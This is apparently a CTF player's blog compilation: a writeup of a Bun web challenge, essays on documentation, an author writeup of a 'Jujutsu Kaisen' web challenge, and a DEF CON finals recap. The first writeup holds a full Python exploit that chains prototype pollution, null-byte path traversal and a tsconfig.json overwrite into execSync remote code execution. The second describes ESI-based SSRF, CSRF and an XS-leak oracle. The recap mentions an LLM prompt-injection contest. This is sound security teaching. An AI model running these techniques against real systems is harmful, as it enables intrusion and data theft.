    Bun.write(outputFile, yamlData);
    return true;
  } catch (error) {
    console.error(error)
    return false;
  }
};

Tracing the logic from above, the arg outputFileString will be the outputFile that we can control the prefix of. First, it’s checked to see if we don’t have any banned words:

const BANNED_STRINGS = [
  "app", "src", ".ts", "node", "package", "bun", "home", "etc", "usr", "opt", "tmp", "index", ".sh"
];

Then, Bun runtime will create a “file” object to perform file I/O stuff on, and the app checks if the file object points to something that already exists. This barricades us from doing too much directory traversal with outputPrefix, because we can’t use any words in BANNED_STRINGS and we also can’t overwrite some other file. I also didn’t really touch on the fact that the file has a bunch of random characters appended to it, and finally, the filetype .yaml added as well, so we can only ever define yaml files, anyway. This situation seems like a good case for null-byte termination. Luckily for us, Bun.file() will seemingly(?) not notice the nullbyte, so something like viewie.txt\00<randomcharacters>.yaml will look like viewie.txt\00<randomcharacters>.yaml. But when Bun.write() is called, something like viewie.txt\00<randomcharacters>.yaml is instead seen as viewie.txt as the write operation implicitly terminates at the null byte. I may be wrong on who’s recognizing the nullbyte, but the point is, we can inject a nullbyte into our outputPrefix to remove the <randomcharacters>.yaml suffix to the filename, AND bypass the existsSync check so we can overwrite important files, and they can be of any extension (not just yaml).

So what about the BANNED_STRINGS list?

“Unfortunately, tsconfig.json isn’t real JSON”

So, to recap:

1. We can add arbitrary properties to a JSON and include a __proto__ key which contains outputPrefix.
2. You can make outputPrefix navigate to any file and overwrite it, and you just need to add a null byte to cancel out the random garbage appended to it.

So we have the ability to write to any writable directory in the app. The final few caveats are the fact that while we control the filename and write to anywhere, remember the contents are JSON that has been YAML-ified. So even if we rename our file to somethingelse.js, the file contents will still be a YAML file of prisoner data, NOT js.

Looking at the BANNED_WORDS list and cross-referencing with the directory structure of the challenge, we can’t really go anywhere except for the files in green.

Actually just kidding, all those files are in /app, which is part of the BANNED_WORDS list. Shame.

Good thing that proc/self/cwd is a symlink to /app.

Minor tangent aside, the only remotely interesting file in there to use, is tsconfig.json. Right now, it doesn’t have much to it. But when looking through the documentation for it, we came across an interesting property, path re-mapping:

the Bun runtime will re-map import paths according to the compilerOptions.paths field in tsconfig.json.

More specifically, according to the official TypeScript documentation:

A series of entries which re-map imports to lookup locations relative to the baseUrl if set, or to the tsconfig file itself otherwise. There is a larger coverage of paths in the moduleResolution reference page. paths lets you declare how TypeScript should resolve an import in your require/imports.

Any require or import in your typescript will be affected by this:

//example tsconfig.json
{
  "compilerOptions": {
    "paths": {
      "jquery": ["./vendor/jquery/dist/jquery"]
    }
  }
}

Then, import 'jquery' in your TS file will make the runtime look for the jquery module in ./vendor/jquery/dist/jquery. We can freely overwrite this file and have it applied when the app crashes. Remember the start.sh script? It will attempt to restart the app if it detects a crash, and when Bun restarts, it will look for a tsconfig.json to apply. If we modify the tsconfig.json to include this property, we can basically tell Bun what code to run for certain imports, allowing us arbitrary code exec this way.

If we were to use path re-mapping, what would be a good candidate to re-map? Our first answer to this was the yaml library, as while it’s used in the app to YAML-ify the JSON data, ther are no other use cases in the app for YAML to be parsed, loaded, etc etc. So, the re-mapping candidate for us will be yaml. When Bun comes across the import { stringify } from 'yaml'; line in index.ts, the tsconfig.json will tell Bun to look to where we tell it to go instead.

So, gathering all our bugs, if we can make the filename tsconfig.json\00<randomcharacters>.yaml, it will resolve to and overwrite tsconfig.json. Wait, our file is still YAML. So when Bun attempts to read the JSON, it will error out! tsconfig.json needs to be valid JSON after all, right?

Right?

I’ll spare the details of how we tried to find all the weird and interesting properties that tsconfig.json will allow for, and how the compiler will parse it.

Here are some things that make it different from regular JSON:

1. It can support comment syntax like /**/ which technically shouldn’t be allowed in JSON formats.
2. Yaml allows // to be used as a key and naturally, Bun will ignore whatever comes after it
3. You can give it a valid JSON structure, then invalid JSON, and the compiler won’t complain.

Anyway, the following “JSON” is a valid, readable and parsable tsconfig.json.

//: |-
  {"compilerOptions":{"paths":{"yaml":["./examples/jeff.json"]}}}
signed.name: jeff
signed.animalType: emu
signed.age: 12
signed.crime: assault
signed.description: clotheslined someone with their neck
signed.start: 2024-03-02T10:45:01Z
signed.release: 2054-03-02T10:45:01Z
signed.__proto__:
  outputPrefix: "../../../../proc/self/cwd/tsconfig.json\0"

We can finally combine all of this into the final solve.

SOLVE

1. Copy an example prisoner JSON file and add your tsconfig path re-mapping:

"//": "\n{\"compilerOptions\":{\"paths\":{\"yaml\":[\"./examples/julia.js\"]}}}",

Which will be valid tsconfig.json. We put our js file into the examples folder simply cause it’s an rwx folder. Then add:

        "signed.__proto__": {
            "outputPrefix":"../../../../proc/self/cwd/tsconfig.json\u0000
        }

The nullbyte to remove the <randomcharacters>.yaml filename, the directory traversal and proc/self/cwd to get the symlink to /app and bypass the BANNED_WORDS list.

2. Make a javascript file and yeet into /examples for RCE (exec getflag and whatever)

3. Crash the app (we did this by trying to write to proc/self/mem) to force a restart and have our overwritten tsconfig.json apply to the app

import requests

REMOTE = True

if REMOTE:
    host = "https://web-prisoner-processor-c8d94eb745951d8e.2024.ductf.dev"
else:
    host = "http://localhost:1337"

# 0. get signature
sig = requests.get(host + "/examples").json()["examples"][0]["signature"]

# 1. overwrite tsconfig.json
requests.post(host+"/convert-to-yaml", json={
    "data": {
        "//": "\n{\"compilerOptions\":{\"paths\":{\"yaml\":[\"./examples/julia.js\"]}}}",
        "signed.name":"jeff",
        "signed.animalType":"emu",
        "signed.age":12,
        "signed.crime":"assault",
        "signed.description":"clotheslined someone with their neck",
        "signed.start":"2024-03-02T10:45:01Z",
        "signed.release":"2054-03-02T10:45:01Z",
        # Object.entries ignores this but for ... in won't
        "signed.__proto__": {
            "outputPrefix":"../../../../proc/self/cwd/tsconfig.json\u0000" #nullbyte to make our own files
        }
    },
    "signature": sig
})

# 2. write rce to examples/julia.js
requests.post(host+"/convert-to-yaml", json={
    "data": {
        "//": """
var dog = 'sed -i "s/signed/$(/bin/getflag)/g" /app/examples/jeff.json';
require("child_process").execSync(dog);

exports.stringify = function(dawg) {return dawg;}
/*""",
        "signed.name":"jeff",
        "signed.animalType":"emu",
        "signed.age":12,
        "signed.crime":"assault",
        "signed.description":"clotheslined someone with their neck",
        "signed.start":"2024-03-02T10:45:01Z",
        "signed.release":"2054-03-02T10:45:01Z",
        "signed.__proto__": {
            "outputPrefix":"../../../../proc/self/cwd/examples/julia.js\u0000 */ //"
        }
    },
    "signature": sig
})

# 3. crash
try:
    requests.post(host+"/convert-to-yaml", json={
        "data": {
            "signed.name":"jeff",
            "signed.animalType":"emu",
            "signed.age":12,
            "signed.crime":"assault",
            "signed.description":"clotheslined someone with their neck",
            "signed.start":"2024-03-02T10:45:01Z",
            "signed.release":"2054-03-02T10:45:01Z",
            "signed.__proto__": {
                "outputPrefix":"../../../../proc/self/mem"
            }
        },
        "signature": sig
    })
except requests.exceptions.ConnectionError:
    pass

# 4. get flag (assuming server takes <5 seconds to come back up)
print("waiting...")
import time
time.sleep(5)
print("flag:", list(requests.get(host + "/examples").json()["examples"][0]["data"].keys())[0][:-len(".name")])

flag: DUCTF{bUnBuNbUNbVN_hOn0_tH15_aPp_i5_d0n3!!!one1!!!!}

Leaving behind a paper trail makes it easy to backtrack and review!

When you have documentation in your projects, if you make a mistake - you can easily review what went wrong by referring to the notes you’ve made. This makes it easy to backtrack and come up with a solution to fix mistakes if they come, improving developer experience!

In Canadian grade school, I was a stereotypical art kid and spent a good amount of time during any creative projects in class going all in. There was an artistic project that required us to recreate a scene from a book we were reading, and I happened to doodle some sketches related to the scene I wanted to draw.

Another kid saw those sketches and complemented me. I said thank you. I asked for permission to go to the bathroom and when I came back, one of those sketches were missing - the kid that complemented me put it into their own work, passing it off as theirs. They were getting compliments about it, about my work, on their project.

how dare they how dare they how dare they how dare they. I spent the next couple hours of that class angrily writing my name onto every sketch that I made. I went to the bathroom again to cry out of frustration.

Was this what it meant to work hard in the vicinity of others who didn’t? Did it matter if you were passionate, if someone thought of you so beneath them that your work was up for grabs? And who would contest them? Who would challenge them? If not for me realizing their blatant attempt to disregard me in my own work, would anyone really notice? I was awkward and quiet. No one would advocate for me. At 9, I had this adorable spiral into an existential crisis of understanding.

I learned about attribution that day in a sad way. Artists, and plenty other people in different disciplines get their work stolen alot more frequently than one would think. There’s a soul-crushing and disheartening nature to the sad realization that all the hard work you put in your projects, things you’re passionate about, has been taken advantage of. A genuine lack of respect for that effort. I needed to document my ownership of my work. I needed documentation for attribution.

Sometimes the answer was covered in something you documented, hidden in plain-sight!

Have you ever answered a question or found a solution to recurring problem, only to come across that problem again and searched frantically for your previous work on it? If you document your projects, it streamlines this process immensely!

…

When I was a kid, I grew up playing videogames. I had a Sony Playstation, the very first generation, and a small CRT that I played on. I played Spyro: Year of The Dragon, extensively. I remember struggling in the tutorial level, when the cheetah character Hunter was teaching you how to hover in order to reach unique areas in the low-poly maps. After grade school would end for the day I would play and eventually figure out how to quickly mash the correct button to hover mid-flight as Spyro, allowing me to progress into the game. I remember being so elated that I drew a doodle of the dragon to celebrate. What I should’ve done was, maybe, write down the correct button combo to easily achieve the hover, or something, as whenever I would return to the game I would constantly forget how to perform that mechanic and I’d lose game hours over it. I looked over to my drawing. A simple Spyro-lookalike with my name, in big - result of my existential crisis from last situation - scribbled under his wing. I didn’t have instructions.

I have a good memory. It has served me well all throughout academia. But I can’t remember everything. No one can. Sometimes, for CTF challenges, I’ll forget snippets of code and payloads that would work in other scenarios. I needed some sort of repository to remember these snippets for me. If you ever wrote down the cheat codes to GTA San Andreas on a piece of paper beside your console, you will know what I mean. I needed to document my shortcuts. I can’t remember them all.

Documentation is paying it forward - other people looking at your work will be able to pick it up easily where you left off.

This is especially the case for open-source, where projects are a collaborative effort! If you want to ensure the longevity of your projects, it is good to have documentation so others can easily figure out what your project is about, how it works, and can pick up on ta-

I remember before moving to the States to start my big girl job, staying at my parents house and my mom helping me clean out some of my things. In the basement, my old Playstation One sat in a corner of a wall tangent to the stairs, placed on top of a box. It was still connected to the CRT. I plugged the TV and Playstation onto power, popped open the lid, and saw that the decades old Spyro game was still in the compartment. I closed the disk lid and powered the PS one on. The TV flickered, a brief flash of yellow and blue and red, and the very familiar orange diamond of the Playstation One startup screen appeared. It was glitchy, and faded - the cathode ray tubes were old old, after all - but the logo flickered, and my excited self took the controller in hand. But all it did was flicker - once, twice, then black. I stared at my reflection in the TV, expressionless. Too much time has passed. Either there was an issue with the TV or an issue with the Playstation. I wasn’t an expert in either to figure out what went wrong. I placed the controller back on the floor and got up to continue packing.

“Didnt the Spyro games get remade? In 2018?” My friend told me, over lunch one day. “Yea, but it’s not enough.” I replied.

A: “How so?”

V: “I’m not sure how to describe it. It just is.”

A: “Appropriately vague.”

V: “I know. I just want to play the original game again.”

A: “What about emulation?”

V: “I’ve tried a bunch. None worked super well for me. Idk, maybe I was using them wrong. The instructions and official guides are vague. I need an actual FAQ, or list of instructions, idk, something, some actual documentation.”

Documentation makes you a better developer.

I played in a CTF sometime in April of 2020 where I didn’t solve the challenge during the competition. At this point, I was about 4 months into the scene so I was well aware of how things worked and just waited around for a writeup to appear. I waited for a bit, until one - eventually - appeared. Happy, I took a read through it. It was written in Chinese, which wasn’t an issue, Google Translate is a thing, and the writeup was amazing and informative and incredible and I didn’t get it at all. It assumed pre-requisite knowledge of other contexts before explaining the main point of the bug. Things that were probably really obvious to seasoned CTF players, but a complete fucking alien language to me at that time. The writeup didn’t commit a sin. I, plainly, just didn’t understand its concepts (Chinese notwithstanding). It frustrated me to no end. I sunk hours, of essentially wasted time, into it. Now that a writeup is available, it’s literally too fucking smart for me to get??

I spent the following next couple of days playing with the challenge locally. Relentlessly poking and prodding at it. Adding print statements everywhere. Deleting chunks of code and re-adding them to see what would happen. Copy-pasting documentation of certain areas in the comments so I could refer to it. I solved it days later. I wrote my own writeup for it, a personal one that I haven’t shared, that explains the concepts like I’m 5. I thank the original author of the first writeup I saw. I created another one to catch me up to speed if I ever forgot the basics again.

Later, I researched. Blogs of security researchers that I was inspired by, news articles, other writeups of other challenges. I compiled their links. Prettified them and slapped them into my Notion. Created a database of Things. I told myself I would learn faster than what my anxieties were holding against me. I didn’t allow myself the opportunity to be confused.

When I was finished, I played some God of War (2018) to unwind. I noticed that the Spyro remake was on sale in the Playstation store.

I ended up playing. It was a package of the 3 original Spyro games of the late 90’s to early 2000’s. I sat down one evening and powered on the Playstation 4. Navigated to the game on the dashboard. I re-learned how to hover.

This time, I wrote it down.

This year, I decided to spice things up with my chals, my vie chals, by incorporating a fun prize for whichever team manages to solve all of my challenges.I had 3 challenges: JaVieScript, Blade Runner, and Jujutsu Kaisen. The first 2 I won’t detail writeups as they’re beginner-friendly and there already exist plenty of writeups for them. The latter one I will detail an author writeup for.

JJK is my first soiree into some sort of full client-side web challenge. I’m really not a client-side person so I had to do some self-education to make sure I really understood these topics before I tested them out in this challenge. I would like to thank Ming/Disna for helping test the challenge and making the solve for it, and to my partner for their knowledge and wisdom that helped me make it.

This writeup assumes knowledge of client-side attacks and certain specifications of web APIs. I don’t go into detail with some of the topics here outside of the direct solve, you’ll need to do some extra reading if you don’t have that context.

TL;DR

POST-based img-tag XSSI -> ESI injection -> img-creation primitive oracle -> XS-leak

The main point of this challenge was using a graphQL regex filter to force an oracle out of pictures with ESI tags embedded in them.

Overview

The app is a private JJK database, featuring some of the characters I like in Gege Akutami’s Jujutsu Kaisen. Comments in the src and the initialization of the Dockerfile indicates that a random character in the database will have injected into their “notes” column the value of the flag. In order to get it, you will need to somehow access that random character’s notes column.

Without going into detail of every file in there, I will highlight the parts of the src that make this exploit work.

/cache_money/default.vcl

vcl 4.1;
import std;

backend app_backend {
    .host = "jjk_app";
    .port = "9080";   
}

backend db_backend {
    .host = "jjk_db";
    .port = "9090";   
}

acl internal {
    "localhost";
    "192.168.0.0/16";
    "172.0.0.0/8";
}

sub vcl_backend_response {
    set beresp.do_esi = true; <------- A
}

sub vcl_recv {
    if (req.http.host ~ "jjk_db" && std.ip(client.ip, "17.17.17.17") ~ internal) {
        set req.backend_hint = db_backend; <-------- B
    } else {
        set req.backend_hint = app_backend;
    }
}

Point A is a configuration in Varnish cache’s vcl that states the cache should parse any file with a < present in it as XML. This includes things that don’t have typical XML structures, such as images or text files. This is further reinforced in the docker-compose.yml file:

docker-compose.yml

version: '3.9'

services:
  jjk_app:
    restart: on-failure
    build: ./app
    # ports:
    #   - '9080:9080'
    depends_on:
      - "jjk_db"
    environment:
      - ADMIN_NAME=placeholder
      - ADMIN_PASSWORD=placeholder
  jjk_db:
    restart: on-failure
    build: ./db
    # ports:
    #   - '9090:9090'
  varnish:
    image: varnish:stable
    container_name: varnish
    volumes:
      - "./cache_money/default.vcl:/etc/varnish/default.vcl"
        # ports:
        # - "80:80"
    tmpfs:
      - /var/lib/varnish:exec
    environment:
      - VARNISH_SIZE=2G  
    command: "-p feature=+esi_disable_xml_check" <------------- HERE
    depends_on:
      - "jjk_app"
  bot:
    build: ./bot/
    init: true
    environment:
      - CHALL_DOMAIN=https://jujutsu-kaisen-2.ctf.maplebacon.org # replaced with real domain on remote
      - ADMIN_USERNAME=placeholder
      - ADMIN_PASSWORD=placeholder
    depends_on:
      - redis
  redis:
    image: redis:6.0-alpine
  # CTF NOTE: This mimics the load balancer we have for all hosted challs. enable it on local for testing. don't attack plz
  nginx:
    build: ./nginx/
    container_name: nginx
    ports:
      - '443:443'
    depends_on:
      - "jjk_app"

The command "-p feature=+esi_disable_xml_check" enables the loose XML parsing from the container side.

Gong back to the default.vcl, B is a special rule that sets any requests to a “jjk_db” to the database endpoint instead of the app’s, as the vcl defines the upstream server of Varnish as the app’s. This comes in handy later.

/db/typedefs.py

import graphene
from graphene import relay
from graphene_sqlalchemy import SQLAlchemyObjectType
from graphene_sqlalchemy_filter import FilterSet

from models import CharactersModel


class CharactersFilter(FilterSet):
    class Meta: ## <------------------- C
        model = CharactersModel
        fields = {
            'name': [...],
            'cursed_technique': [...],
            'occupation': [...],
            'notes': [...],
        }

class CharactersTypeDef(SQLAlchemyObjectType):
    class Meta:
        model = CharactersModel
        interfaces = (relay.Node,)

## For mutations
class CharacterFields:
    id = graphene.Int()
    name = graphene.String()
    occupation = graphene.String()
    cursed_technique = graphene.String()
    img_file = graphene.String()
    notes = graphene.String()


class AddCharacterFields(graphene.InputObjectType, CharacterFields):
    pass

Point C is where a filter is defined for use in the graphQL endpoint in the application. The filterset, which is defined by a 3rd-party library called graphene_sqlalchemy_filter, utilizes regex-esque (it’s not actually fully regex) filters that can be used on 4 different columns: name, cursed_technique, occupation, and notes. The last column is of importance as that is where the flag will exist.

app/app.y

def upload_handler():
    if request.method == "GET":
        return render_template("newchar.html")
    elif request.method == "POST":
        name = request.form.get('name')
        occupation = request.form.get('occupation')
        cursed_technique = request.form.get('cursed_technique')
        notes = request.form.get('notes')
        upload = request.files.get('file')

        if upload is None:
            return render_template("error.html", error="You can't upload an empty file!")

        ext = upload.filename.split(".")[-1]
        
        if ext != "png":
            return render_template("error.html", error="I see what you're trying to do.")

        filename = secure_filename(os.urandom(42).hex())

        mutation = MUTATION.format(name=name, occupation=occupation, cursed_technique=cursed_technique, notes=notes, ct=cursed_technique)

        r = requests.post(GRAPHQL_ENDPOINT, json={"query": mutation, "variables": None})

        if (r.json()["data"]["addNewCharacter"]['status'] == True):
            upload.save(f"uploads/{filename}.{ext}")
            return redirect(f"/view/{filename}.{ext}")
        else:
            return render_template("error.html", error="Something went wrong when trying to upload through graphql!")

This is the route that handles the creation of new characters. You have the option to upload files, but they’re extension-checked as png images. Notably, if you upload a character, you’re then redirected to that image.

I won’t go into the code too deep, but there is also an admin bot that logs in as me, then navigates to a user-defined URL. The cookies are not CSRF-safe.

You now have all the components of the challenge needed to figure out the solve. Let’s go ahead to see how that looks.

THE GRAPHQL FILTERS

The filters used in graphQL are totally fine and safe on their own. But the way that this app is coded, the filters create an opportunity to make an oracle-based attack. Since I put the flag in the notes column of one particular JJK character, a filter such as this:

{
    getCharacters(
        filters: {
            notesLike: "%FLAG_SO_FAR%"
        }) {
        edges {
            node {
                name,
                notes
            }
        } 
    }
}

Will leak the flag char by char.

HIDING THINGS IN PNGS AND VARNISH XML PARSING

I’ve used this technique before in my previous challenge, Makima. The IDAT chunks of a .png image are critical (read: you can’t make a png without them) as they define the actual bytes that comprise the pixels that make an image. IDAT chunks are the output datastream of the compression algorithm stipulated by the .png’s IHDR chunk, another critical metadata chunk. There can be numerous IDAT chunks, naturally, depending on the size of any given image, and behind the lens, they’re just a bunch of bytes…

With some readable text defining where a chunk starts and another ends.

Now, I coded the app to ensure that only .png images are uploaded into the database. But remember that Varnish has been configured to parse ANY file (regardless of type) as XML if a < is present within - so that means we find ourselves in an image manipulation scheme.

Like I said before, the IDAT chunks of a .png defines the actual image. You can also, just, hide bytes in those chunks and smuggle them in whilst still having a valid .png, as long as the critical chunks (defined in the png specification) are present and not mangled in any way. Do you get an actual image? No, probably not. But if you hide in the byte for a < in there, Varnish will think it’s XML.

So great, you got an opportunity to parse XML in an image but what do you do with it?

EDGE-SIDE INCLUDES

Before I talk about ESI tags, I’ll talk about things that won’t work with the primitive we have with images.

XXE’s don’t work, because you actually never see the output of your XXE command since you never see the character you add again. This is because the user only has capabilities to add new characters (more on that in a sec), and there’s only one user, Vie (me, well, the bot) and there’s no other users to log in to or register in.

So, sure, you can parse XML but you don’t see the output. Not a super useful primitive for us if we wanted to actually see stuff. So what next?

Edge-Side Includes are a cache feature that speeds up dynamic web content retrieval. It’s a markup language with XML flavour. According to Wikipedia, ESIs serve the purpose of improving scaling of an application as they’re meant to be blazing fast mechanisms to generate content. Varnish can utilize, parse and render ESI tags as well as many other caching solutions.

Edge-Side Includes also have different features, such as a specific “includes” directive: inclusion of page fragments, which stipulate to the upstream server where to retrieve that content from.

Where to retrieve that content from. This smells like an SSRF attack.

Recall a little earlier point B in the overview: “B is a special rule that sets any requests to a “jjk_db” to the database endpoint instead of the app’s, as the vcl defines the upstream server of Varnish as the app’s”. If you do a little debugging while working through the challenge, you will observe that an ESI tag with the inclusion directive to a specified website will simply make a request to that website, and put in the host header the value of that server. This plays really nicely with the custom rule observed in the default.vcl configuration, meaning that we can SSRF the database endpoint through an ESI tag processed by Varnish. Or, more specifically, we can SSRF the database endpoint through an ESI tag embedded in the IDAT chunks of a .png image that is processed by Varnish with the loose XML parsing feature explicitly enabled.

We’ve gone through a lot. The exploit path is now clear: Create images programmatically such that you embed your graphql filter payload in the images you make, then upload them into the database and request for that content again to trigger Varnish and the ESI parsing. Do this in a loop, updating your filter with each correctly-guessed character in the flag. This is all well and good, but we still have a few details to iron out.

CSRF THE BOT

The bot, Vie/me, logs in and then navigates to a URL. It can also be observed that the bot’s cookies are not protected from CSRF attacks. Combining our knowledge of our exploit above, the “upload” part is not actually done by us, but done by the bot that is CSRF’ed by us. Great, sounds good. One problem though - When the bot gets the redirect to the image after uploading a new character, that image will contain the results of the filter that has our flag oracle. We still can’t see that, though. The bot is redirected regardless of a valid/invalid image, so is there actually no oracle to be used?

Let’s talk a little bit about this oracle. So, no, you will never see the output of that image, when parsed by Varnish. Your next best thing is to go the XS-Leaks route. A redirect happens when the image is uploaded, but it can be valid/invalid. What can make a .png image invalid? Lots of things, but the one thing we can do easily is mangling the IDAT chunks and creating an image with a size disagreeable with the metadata. When that happens, the image refuses to load, naturally. Now, we can do that pretty easily with ESI tags.

Recall that ESI tags are used to help scaling by rendering generated content when assembling webpages. An ESI tag with the inclusion directive will render the result of wherever that inclusion directive went into the file it’s in. So, say that you have a succesfull graphql filter result, from correctly guessing a character in the flag. The length of that valid result will be longer than the length of a result of an invalid guess in the filter. You can additionally pad the length further by requesting for other fields to reflected in graphql, so you get an extra long response. This response gets rendered in the image, in place of where the ESI tag was. The extra bytes that get filled in can then mangle and warp the size of the image, making it invalid, and it therefore won’t load. On the flip side, an incorrect guess yields a shorter result, so not that long of a response that is rendered where the ESI tag was in the image, and potentially not mangling the image size as much.

That’s our primitive. We can now create a valid/invalid images and detect if the load was succesful, giving us a reliable and stable XS-Leak.

SERVICE WORKERS

We now need a way to programmatically make the admin bot upload characters with an image primitive, then detect the result of that image load. We can do this with Service Workers.

Without going into detail, Service Workers are a modern web API that really improve the offline experience of webpages, but in my challenge they’re used to intercept requests.

We use SWs here to trigger a POST request instead of a GET request. Why?

Our payload is an image, and we are detecting if whether or not it loaded or error’ed out. Since only the admin visiting our site sees the actual image or not, we need to detect the loading using scripting to detect an onload or onerror event when an <img src="UPLOAD ENDPOINT"> loads. But img tags are only ever generic GET requests, so you must use a registered SW to intercept that request and convert it into a POST to actually upload your image. When the redirect occurs, your <img> source will either load or not load.

ALTOGETHER NOW

Create a script to programmatically embed ESI tags which reach the db endpoint with the graphql filter in the query parameters into the IDAT chunks of an image. Make the admin bot navigate to your site where it hosts that script and loads an <img src="UPLOAD ENDPOINT"> where a registered SW will intercept it into a POST request and upload your ESI’d image. When the redirect occurs, observe if whether or not your <img> tag succesfully loaded or error’ed to determine if the flag guess you made was correct. Repeat this process until you get a flag. Full source of solve is in here. Special thanks to Ming!

I made this challenge with the intention of it being solved in a full day, to a full day and a half. Of course, due to some issues such as the jjk_db endpoint being public-facing which was not what I wanted, a few unintended solutions existed. Such is life, but i hope that the intended solution is interesting enough to the readers here.

Back in October of 2019, I was attending my 3rd/4th? year at UBC, where I tried to play in a beginner-friendly CTF known as “CSAW 2019” with UBC’s team: Maple Bacon. Particularly, I tried out a challenge called Unagi, which, having spent an eternity on, I managed to solve after hours of wrangling with the problem.

To be completely frank, I solved the challenge after googling “XML vulnerability” and trying out payloads - really, just, throwing payloads and modifying them to tailor the challenge - until one stuck and I got the flag. I was happy, but I also thought, “what the hell did I achieve? what did the payload do? What did I learn?” and I couldn’t come up with an answer I was satisfied with. I really just googled information about XML vulenrabilities, found an XXE payload, and threw it hoping to see if something would change (I didn’t even know what XXE stood for). Granted, I still needed to modify the payload. Unagi required more effort than just a copy-paste. But overall, my first experience was largely juvenile and I was still as naive as I was pre CSAW 2019.

I remained curious in CTFs the following year, but didn’t really play in them as much until I was complaining to a friend of mine about something entirely different - Super Smash Bros. I really liked the game, I was playing in it so much I was considering playing it competitively (nothing too serious really came out of that) but I wanted something else to satisfy my competitive nature. So my friend suggested DEF CON.

V: “Like the alarm codes?”

L: “Okay, yeah, but I’m talking about the hacking competition.”

V: “Hacking? Yea, like CTFs? I’m familiar.”

L: “Uh huh, like the movie Hackers. You know, the one with Angelina Jolie?”

V: “Wait, Angelina Jolie was in a movie called Hackers?”

L: “You’re missing the point. Have you ever considered CTFs to help with your competitive nature?”

I knew the CTF scene, not that well, but I knew it. I played in a CTF with MB, and I thought about what my friend said. I figured, sure, why not?

I attended my first few meetings with them, exploring CTFs, starting with PicoCTF under prof. Robert Xiao’s advice. Pico was considerably easier than CSAW, generous with hints and well-scoped for people to learn something new in security. I took my time, taking a couple days to solve all. The series of SQLi challenges, when I came across them, gave me a challenge at the time. But when I solved them, I was elated - happy, cause submitting a flag felt really, really good.

Debriefing on the Pico challenges after submitting all of the web ones, Robert Xiao talked about DEF CON. I had minor context from my own research and from what my friend told me, but hearing him talk about it and all the cool challenges he saw was inspiring. DEF CON CTF seemed interesting, challenging, but importantly - fun. I wanted to participate.

Recall that at the time that I resolved to participate, I barely knew what an XXE was, nor did I play in any harder challenges outside of Pico and one (1) CSAW challenge. So, was the goal of DEF CON attainable? Not anytime soon at that point in time. I gave myself a comfortable margin of 7 years. If I could be in Vegas for DEF CON 7 years from then (2020), I’d be set.

That was 3 years ago.

Maple Bacon

I’d really like to first explain some things pre-DEFCON 31 Finals. You may notice during the quals, MMM wasn’t there - Parliament of Ducks was. That was actually our, Maple Bacon’s, decision.

I’m not dumb. I knew that last year, the announcement of the merge between The Duck, PPP and us was a shock, simply because 1/3rd of that merge was not as highly-regarded as the other two. I know that. PPP has several different championships under their name, and Theori (The Duck) is a security powerhouse, an extension of one of PPP’s co-founders Bpak. So what was Maple Bacon doing there? At the time of DEF CON 30 I was the leader of Maple Bacon, and like I said, I’m not dumb. I knew what others thought of the merge. I knew that Maple Bacon came into their first DEF CON with 0 prior DEF CON wins. I knew people would talk. But I was the leader. So I also knew that my team was determined, ambitious, and capable. They were nervous, maybe a little green, but I saw all of their progress and development, ever since the inception of the team. I was there for all of it. I knew they were good. And clearly, so did PPP and The Duck.

Sorry for the soap opera paragraph. Back to the original question.

We were the unlikeliest team to show up in said merge. The answer, given the context, is simple. We wanted to be taken seriously (yes, even after DEF CON 30 victory). And during quals, we wanted to show that we were just as ready for DEF CON as others. We had less than 15 people play during quals. It sucks that we missed the qualifying threshold, but for a very brief moment, I think we made other teams do a double take for a good portion of those quals. If other teams had, at one point, felt a brief but palpable shock at our existence on the scoreboard, that’s a success for me. Doing our best with far less people than many other teams, and having that reflected in our quals performance, felt pretty good.

Since I graduated from UBC, Maple Bacon has transferred into new leadership. I’m certainly still involved but in a much smaller capacity. However, I must’ve done something alright if they’re still going strong today. DEF CON isn’t their only win, and it isn’t the only big CTF they’ve done incredibly well in. Like I said, I know my team, and I see with my own eyes the sights they’re setting and the hard work they’re putting in. They’ve earned the respect they have recieved.

DEFCON: PREP

Thursday, prep day. I arrived in Vegas a little earlier, and managed to get quite a few things accomplished. I met some old friends and new people, from co-workers to other CTF players I really admire and respect. Synced up with my team for the night, and got everything - tooling, roles, infrastructure setup - organized.

Later that night I went to the Chandelier bar at the Cosmopolitan hotel, and had the Secret Menu drink called the “Verbena”, which, IFYKYK, and oh my god I did not and what a shock to my senses that was.

At least the bar was pretty though

DEFCON: DAY I

I was on the floor the first day and helped set things up. Last year, I was expecting a similar setup of round tables in a single room, so it was quite a nice surprise to see a far larger area for us, with nicer setups for each team. I think others have echoed similar sentiments but the CTF gave you 0 free time to check out the rest of DEF CON, which is a damn shame cause I really wanted to see some of my co-workers over at AI Village. Cest la’ Vie.

DEFCON: DAY II

In case you forget our names.

After the network closed on day 1 we were informed of the fact that no challenges will be retired for the rest of the CTF. This was a pretty significant change to the meta, since we would have to keep looking for deeper bugs in day 1 chals while also balancing looking for bugs for future challenges. The night between day 1 and day 2 was a sleepless one for most of us, and very surprisingly I found myself busy with a web challenge released towards the end of day 1.

Day 2 starts and we started coming across connectivity issues, which was later revealed to be container misconfigurations that affected several other teams. While frustrating, I think we’re all used to testing exploits locally so luckily that didn’t affect our workflow too much. Besides rationing connections, a bunch more challenges were released and the ennui of it all was definitely starting to settle in. While we managed to have all challenges accounted for, the balancing act definitely had its effects on us.

DEFCON: DAY III

DEF CON DAY 3 :]

About 6-ish hours of sleep (which is ALOT for DEF CON days) later, day 3 starts and I was dual-wielding patch-busting and LLM prompt injection, which is a brand new sentence if I’ve ever seen one. There was an LLM KotH challenge that had players submit attack and defense prompts to get other team’s LLMs to spit out a provided secret. It’s a nice challenge, certainly applicable to the landscape of AI today.

Near the end of day 3 we were mostly fixated on the last LiveCTF match between us (Jinmo) and Hypeboy, and it was nerve-wracking, to say the least. It was a race against time to figure out why the exploit wasn’t working remotely even though it was fine locally, which we later discover was a network hiccup - anyway, the match continued into sudden death, with Jinmo clutching and securing us LiveCTF 1st place.

Creds to Zaratec

What a beautiful scoreboard.

AWARDS CEREMONY

